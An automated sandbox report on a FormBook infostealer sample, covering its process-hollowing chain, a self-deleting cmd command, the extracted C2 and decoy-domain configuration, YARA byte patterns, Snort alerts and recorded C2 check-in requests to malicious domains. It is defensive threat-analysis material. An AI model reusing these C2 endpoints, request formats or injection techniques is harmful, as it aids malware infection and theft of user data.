Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
GCeHcfCef8.exe

Overview

General Information

Sample Name:GCeHcfCef8.exe
Original Sample Name:841031a37159398b8eebca7bb7eff56b.exe
Analysis ID:1331069
MD5:841031a37159398b8eebca7bb7eff56b
SHA1:1848cf9917341a151a4cd8c3ff041525a4d075eb
SHA256:0ad9757a6895b3595b4eaa5a71cca88d658a1c21f335b8d3268949d659e27fda
Tags:32exetrojan
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
Queues an APC in another process (thread injection)
.NET source code contains very large array initializations
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Found decision node followed by non-executed suspicious APIs
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • GCeHcfCef8.exe (PID: 6280 cmdline: C:\Users\user\Desktop\GCeHcfCef8.exe MD5: 841031A37159398B8EEBCA7BB7EFF56B)
    • GCeHcfCef8.exe (PID: 7052 cmdline: C:\Users\user\Desktop\GCeHcfCef8.exe MD5: 841031A37159398B8EEBCA7BB7EFF56B)
      • explorer.exe (PID: 2592 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • cmmon32.exe (PID: 5656 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: DEC326E5B4D23503EA5176878DDDB683)
          • cmd.exe (PID: 6380 cmdline: /c del "C:\Users\user\Desktop\GCeHcfCef8.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 1104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 list": ["www.nightoracle.com/rs10/"], "decoy": ["starryallure.com", "mania-31.online", "baba-bt-top1.buzz", "jwilkinsartscapeinc.com", "tallerhazop.com", "lulu013.com", "pontoimediato.com", "stmc-company.com", "thesoftwarepractitioner.com", "makemoneywithsherrie.com", "algaroba.com", "smartbookmarks.info", "burneysaw.com", "fftsxxx.top", "hvr998.com", "sofisticars.store", "clickit.fun", "couches-sofas-16683.bond", "ikkasolutions.com", "oakvisa.com", "totalkfood.com", "guillaumecarreau.com", "biomagnetismocolombia.com", "jrszhiboz.com", "rewmio.xyz", "willowliy.com", "calm-plants.com", "robertjamesfineclothing.com", "wgardsgm.live", "dngbdk9jpusxpwr.com", "slycepicklegear.com", "mtauratarnt.com", "simolified.com", "mekkamochi.com", "deeprootedleader.com", "container-houses-vn.click", "roundaboutlogistics.com", "m-baer.com", "electric-cars-19095.bond", "destinydinos.com", "taxretentionstrategiesgroup.com", "zg9tywlubmftzw5ldzi0mdm.com", "cleaning-products-29334.bond", "metaastrologia.com", "practicaloutsource.com", "w1nb74.top", "just-one.info", "cryptarrow.com", "omarshafie.online", "latitudeinformatics.com", "fhstbanknigeria.com", "hdlive7.live", "laserhairremovalkit.com", "into-org.com", "kzjsm.com", "juara102-azura.com", "digitsum.com", "cabins-prefab.online", "allisonparlinart.com", "cpsgrantstream.com", "everythingbutthetruck.com", "w6k3v.com", "alfarizkigrup.com", "gs3ekdj3ixe.asia"]}
SourceRuleDescriptionAuthorStrings
00000004.00000002.3791675390.0000000002680000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000002.3791675390.0000000002680000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.3791675390.0000000002680000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000004.00000002.3791675390.0000000002680000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000004.00000002.3791675390.0000000002680000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18849:$sqlite3step: 68 34 1C 7B E1
      • 0x1895c:$sqlite3step: 68 34 1C 7B E1
      • 0x18878:$sqlite3text: 68 38 2A 90 C5
      • 0x1899d:$sqlite3text: 68 38 2A 90 C5
      • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 24 entries
      SourceRuleDescriptionAuthorStrings
      2.2.GCeHcfCef8.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.GCeHcfCef8.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.GCeHcfCef8.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          2.2.GCeHcfCef8.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          2.2.GCeHcfCef8.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x18849:$sqlite3step: 68 34 1C 7B E1
          • 0x1895c:$sqlite3step: 68 34 1C 7B E1
          • 0x18878:$sqlite3text: 68 38 2A 90 C5
          • 0x1899d:$sqlite3text: 68 38 2A 90 C5
          • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 5 entries
          No Sigma rule has matched
          Timestamp:192.168.2.1135.186.223.18049714802031412 10/24/23-08:28:29.857367
          SID:2031412
          Source Port:49714
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.11104.19.157.2349717802031412 10/24/23-08:29:30.721718
          SID:2031412
          Source Port:49717
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.1123.227.38.7449718802031412 10/24/23-08:29:51.038616
          SID:2031412
          Source Port:49718
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.113.33.130.19049716802031412 10/24/23-08:29:11.748633
          SID:2031412
          Source Port:49716
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.11104.247.82.5149723802031412 10/24/23-08:31:16.668472
          SID:2031412
          Source Port:49723
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.11103.224.212.21249713802031412 10/24/23-08:28:09.457640
          SID:2031412
          Source Port:49713
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.11103.224.212.21049721802031412 10/24/23-08:30:33.279150
          SID:2031412
          Source Port:49721
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.11104.21.69.17449722802031412 10/24/23-08:30:53.443055
          SID:2031412
          Source Port:49722
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 00000004.00000002.3791675390.0000000002680000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.nightoracle.com/rs10/"], "decoy": ["starryallure.com", "mania-31.online", "baba-bt-top1.buzz", "jwilkinsartscapeinc.com", "tallerhazop.com", "lulu013.com", "pontoimediato.com", "stmc-company.com", "thesoftwarepractitioner.com", "makemoneywithsherrie.com", "algaroba.com", "smartbookmarks.info", "burneysaw.com", "fftsxxx.top", "hvr998.com", "sofisticars.store", "clickit.fun", "couches-sofas-16683.bond", "ikkasolutions.com", "oakvisa.com", "totalkfood.com", "guillaumecarreau.com", "biomagnetismocolombia.com", "jrszhiboz.com", "rewmio.xyz", "willowliy.com", "calm-plants.com", "robertjamesfineclothing.com", "wgardsgm.live", "dngbdk9jpusxpwr.com", "slycepicklegear.com", "mtauratarnt.com", "simolified.com", "mekkamochi.com", "deeprootedleader.com", "container-houses-vn.click", "roundaboutlogistics.com", "m-baer.com", "electric-cars-19095.bond", "destinydinos.com", "taxretentionstrategiesgroup.com", "zg9tywlubmftzw5ldzi0mdm.com", "cleaning-products-29334.bond", "metaastrologia.com", "practicaloutsource.com", "w1nb74.top", "just-one.info", "cryptarrow.com", "omarshafie.online", "latitudeinformatics.com", "fhstbanknigeria.com", "hdlive7.live", "laserhairremovalkit.com", "into-org.com", "kzjsm.com", "juara102-azura.com", "digitsum.com", "cabins-prefab.online", "allisonparlinart.com", "cpsgrantstream.com", "everythingbutthetruck.com", "w6k3v.com", "alfarizkigrup.com", "gs3ekdj3ixe.asia"]}
          Source: GCeHcfCef8.exeReversingLabs: Detection: 45%
          Source: GCeHcfCef8.exeVirustotal: Detection: 55%Perma Link
          Source: Yara matchFile source: 2.2.GCeHcfCef8.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.GCeHcfCef8.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.3791675390.0000000002680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3793711799.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1345322177.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: http://www.robertjamesfineclothing.com/rs10/?s0=h9cyBphY8kcBiKucT47V20wqq+uuKxDlnXh3oTW0sJJqbjikvIbKCSguXroGzz3qjH88&CB_=7nEpdJsAvira URL Cloud: Label: malware
          Source: http://www.rewmio.xyz/rs10/www.totalkfood.comAvira URL Cloud: Label: phishing
          Source: http://www.zg9tywlubmftzw5ldzi0mdm.com/rs10/Avira URL Cloud: Label: malware
          Source: http://www.robertjamesfineclothing.comAvira URL Cloud: Label: phishing
          Source: http://www.guillaumecarreau.com/rs10/Avira URL Cloud: Label: malware
          Source: http://www.cryptarrow.com/rs10/www.starryallure.comAvira URL Cloud: Label: malware
          Source: http://www.mtauratarnt.com/rs10/Avira URL Cloud: Label: malware
          Source: http://www.cryptarrow.com/rs10/Avira URL Cloud: Label: malware
          Source: http://www.starryallure.com/rs10/www.roundaboutlogistics.comAvira URL Cloud: Label: malware
          Source: http://www.m-baer.com/rs10/?s0=ZZ4PisnlhGWrM+/cjm+8AJE09HfnDkVQJTexn2MBWRnXnlNv1XnPYSI4wm3ClD5tCXKT&CB_=7nEpdJsAvira URL Cloud: Label: malware
          Source: http://www.cryptarrow.com/rs10/?s0=/ItgkxO8+brroXQDZXm3WikSbiD+2fsSKu8F0pp3MeXxfp3Mbl7kcl4ctkKIsIVoIHZ+&CB_=7nEpdJsAvira URL Cloud: Label: malware
          Source: https://login.microsoftonline.coAvira URL Cloud: Label: phishing
          Source: http://www.hdlive7.live/rs10/Avira URL Cloud: Label: malware
          Source: http://www.robertjamesfineclothing.com/rs10/Avira URL Cloud: Label: malware
          Source: http://www.mtauratarnt.com/rs10/www.robertjamesfineclothing.comAvira URL Cloud: Label: malware
          Source: http://www.mtauratarnt.com/rs10/?s0=pPtLjK/TtyZx8Wb0OUx+WEjNRlgjs/QTeyWPHt+QyMOk/3bi5sdkKHli52Eg/aHEIkd2&CB_=7nEpdJsAvira URL Cloud: Label: malware
          Source: http://www.robertjamesfineclothing.com/rs10/www.cleaning-products-29334.bondAvira URL Cloud: Label: malware
          Source: www.nightoracle.com/rs10/Avira URL Cloud: Label: malware
          Source: http://www.m-baer.com/rs10/Avira URL Cloud: Label: malware
          Source: http://www.m-baer.com/rs10/www.rewmio.xyzAvira URL Cloud: Label: malware
          Source: http://www.rewmio.xyz/rs10/Avira URL Cloud: Label: phishing
          Source: http://www.hdlive7.liveAvira URL Cloud: Label: malware
          Source: http://www.guillaumecarreau.com/rs10/www.omarshafie.onlineAvira URL Cloud: Label: malware
          Source: http://www.guillaumecarreau.comAvira URL Cloud: Label: malware
          Source: http://www.nightoracle.com/rs10/Avira URL Cloud: Label: malware
          Source: http://www.starryallure.com/rs10/Avira URL Cloud: Label: malware
          Source: http://www.starryallure.comAvira URL Cloud: Label: malware
          Source: http://www.nightoracle.comAvira URL Cloud: Label: phishing
          Source: www.nightoracle.comVirustotal: Detection: 5%Perma Link
          Source: www.m-baer.comVirustotal: Detection: 5%Perma Link
          Source: www.robertjamesfineclothing.comVirustotal: Detection: 8%Perma Link
          Source: www.starryallure.comVirustotal: Detection: 7%Perma Link
          Source: http://www.robertjamesfineclothing.comVirustotal: Detection: 8%Perma Link
          Source: http://www.m-baer.comVirustotal: Detection: 5%Perma Link
          Source: GCeHcfCef8.exeJoe Sandbox ML: detected
          Source: GCeHcfCef8.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: GCeHcfCef8.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: EWuh.pdb source: GCeHcfCef8.exe
          Source: Binary string: EWuh.pdbSHA256. source: GCeHcfCef8.exe
          Source: Binary string: cmmon32.pdb source: GCeHcfCef8.exe, 00000002.00000002.1372514959.0000000001630000.00000040.10000000.00040000.00000000.sdmp, GCeHcfCef8.exe, 00000002.00000002.1372284641.000000000125D000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000002.3790403174.0000000000450000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: GCeHcfCef8.exe, 00000002.00000002.1372514959.0000000001630000.00000040.10000000.00040000.00000000.sdmp, GCeHcfCef8.exe, 00000002.00000002.1372284641.000000000125D000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000002.3790403174.0000000000450000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: GCeHcfCef8.exe, 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000003.1372708698.0000000003FE1000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000003.1374395902.00000000041C7000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: GCeHcfCef8.exe, GCeHcfCef8.exe, 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000003.1372708698.0000000003FE1000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000003.1374395902.00000000041C7000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 4x nop then pop edi2_2_00416CEB
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then pop edi4_2_00416CEB

          Networking

          barindex
          Source: C:\Windows\explorer.exeNetwork Connect: 103.224.212.212 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 103.224.212.210 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 35.186.223.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.69.174 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 104.19.157.23 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 104.247.82.51 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 3.33.130.190 80Jump to behavior
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.11:49713 -> 103.224.212.212:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.11:49714 -> 35.186.223.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.11:49716 -> 3.33.130.190:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.11:49717 -> 104.19.157.23:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.11:49718 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.11:49721 -> 103.224.212.210:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.11:49722 -> 104.21.69.174:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.11:49723 -> 104.247.82.51:80
          Source: Malware configuration extractorURLs: www.nightoracle.com/rs10/
          Source: Joe Sandbox ViewASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
          Source: Joe Sandbox ViewASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /rs10/?s0=3hcrZOpg0bcnkhh15AgNBYOBAaFzA2w39b7OLOTzLX17gT7vmmZNER029cGGSq2teP1k&CB_=7nEpdJs HTTP/1.1Host: www.fhstbanknigeria.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rs10/?s0=ZZ4PisnlhGWrM+/cjm+8AJE09HfnDkVQJTexn2MBWRnXnlNv1XnPYSI4wm3ClD5tCXKT&CB_=7nEpdJs HTTP/1.1Host: www.m-baer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rs10/?s0=slgSrzWs1cS9Mrf67s4eYcm1uzSVXOcUNS0TfgAxqWiu35L4D0Krxoj420pmZqiiSKyn&CB_=7nEpdJs HTTP/1.1Host: www.totalkfood.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rs10/?s0=/ItgkxO8+brroXQDZXm3WikSbiD+2fsSKu8F0pp3MeXxfp3Mbl7kcl4ctkKIsIVoIHZ+&CB_=7nEpdJs HTTP/1.1Host: www.cryptarrow.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rs10/?s0=b31BqU8cfCYi6WO0sgYPso6gRJvymF5WHiXPhCkAgId39DsuJJ4fruR04rjCCBvdCTM/&CB_=7nEpdJs HTTP/1.1Host: www.starryallure.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rs10/?s0=SxqHGPQdBS+BYer8hqwa4D8rXi7vUXAn+pZ+h1ux2Xs7o9rzQOK5UHTSqPoHiKM2C6Px&CB_=7nEpdJs HTTP/1.1Host: www.nightoracle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rs10/?s0=pPtLjK/TtyZx8Wb0OUx+WEjNRlgjs/QTeyWPHt+QyMOk/3bi5sdkKHli52Eg/aHEIkd2&CB_=7nEpdJs HTTP/1.1Host: www.mtauratarnt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rs10/?s0=h9cyBphY8kcBiKucT47V20wqq+uuKxDlnXh3oTW0sJJqbjikvIbKCSguXroGzz3qjH88&CB_=7nEpdJs HTTP/1.1Host: www.robertjamesfineclothing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 23.227.38.74 23.227.38.74
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 134Content-Type: text/html; charset=UTF-8Date: Tue, 24 Oct 2023 06:28:30 GMTConnection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 34 30 33 3c 2f 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e Data Ascii: <!doctype html><meta charset="utf-8"><meta name=viewport content="width=device-width, initial-scale=1"><title>403</title>403 Forbidden
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Tue, 24 Oct 2023 06:29:11 GMTContent-Type: text/htmlContent-Length: 291Connection: closeETag: "65271109-123"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 24 Oct 2023 06:29:51 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4515Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Tue, 24 Oct 2023 06:30:06 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0QFe%2BigM2W9xjZuxxhYuD21NF6hfLHhuYwiXnDDNNDNU9n7pvn3nhDKB7RfiTsFdJVKNDYT%2F5%2B8jgEa9mt8UfwfBlS6QwOE%2F5PgPz%2BprPHaw9wx2Qw%2FsapuixXTY3twvZjrTMszY"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=13.999939Server: cloudflareCF-RAY: 81b02af23c27061b-IADalt-svc: h3=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 